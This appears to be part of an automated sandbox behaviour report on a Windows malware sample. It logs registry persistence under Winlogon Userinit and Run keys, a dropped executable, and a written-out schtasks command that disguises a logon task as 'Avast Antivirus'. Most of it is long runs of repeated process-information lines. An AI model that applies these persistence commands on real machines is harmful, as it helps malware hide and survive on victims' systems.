Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre			Jump to behavior

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

File created: C:\Users\user\xdwdPutty.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregre	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio

Stores large binary data to the registry

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE D396F3C20883A3B71244C87C537595108010239E4E17E6C09BCA83EA5A475677

Jump to behavior

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process information set: NOOPENFILEERRORBOX
